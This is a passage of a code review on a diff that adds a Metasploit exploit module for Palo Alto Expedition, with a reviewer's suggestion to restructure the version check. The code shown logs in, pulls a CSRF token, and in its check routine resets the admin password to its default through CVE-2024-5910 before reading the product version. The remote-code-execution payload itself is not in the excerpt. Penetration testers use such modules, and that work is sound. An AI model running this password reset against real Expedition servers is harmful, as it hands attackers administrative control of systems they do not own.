modules/exploits/linux/http/paloalto_expedition_rce.rb

```diff
@@ -0,0 +1,279 @@
+            }
+          ]
+        ],
+
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Username for authentication, if available']),
+        OptString.new('PASSWORD', [false, 'Password for the specified user']),
+        OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/'])
+      ]
+    )
+  end
+
+  def xsrf_token_value
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/Auth.php'),
+      'keep_cookies' => true,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'get',
+        'type' => 'login_users',
+        'user' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    data = res.get_json_document
+
+    fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['csrfToken']
+
+    print_good('Successfully authenticated')
+
+    csrftoken = data['csrfToken']
+    fail_with(Failure::UnexpectedReply, 'csrftoken not found.') unless csrftoken
+    vprint_status("csrftoken: #{csrftoken}")
+    csrftoken
+  end
+
+  def check
+    unless datastore['USERNAME'] && datastore['PASSWORD']
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
+      )
+
+      unless res
+        fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+      end
+
+      if res.code == 403
+        return CheckCode::Safe
+      end
+
+      fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.to_s.include?('Admin password restored to')
+
+      respass = res.to_s.match(/'([^']+)'/)[1]
+      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
+      datastore['PASSWORD'] = respass
+      datastore['USERNAME'] = 'admin'
+    end
+
+    @xsrf_token_value = xsrf_token_value
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'bin/MTSettings/settings.php?param=versions'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      }
+    )
+
+    data = res.get_json_document
+    version = data['msg']['Expedition']
+
+    if version.nil?
+      return CheckCode::Unknown
+    else
+      print_status('Version retrieved: ' + version)
+    end
+
+    if Rex::Version.new(version) <= Rex::Version.new('1.2.95')
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
```

Comment:
```suggestion
    if version.nil?
      return CheckCode::Unknown
    end
    
    print_status('Version retrieved: ' + version)
    
    if Rex::Version.new(version) > Rex::Version.new('1.2.95')
      return CheckCode::Safe
    end
    
    return CheckCode::Appears
```

- No need for an `if-else` if the `if` results in a return.
- As the `check` method is basically a collection of conditions with the last one returning "vulnerable yay!", I think it's better to have the last return being `CheckCode::Appears`.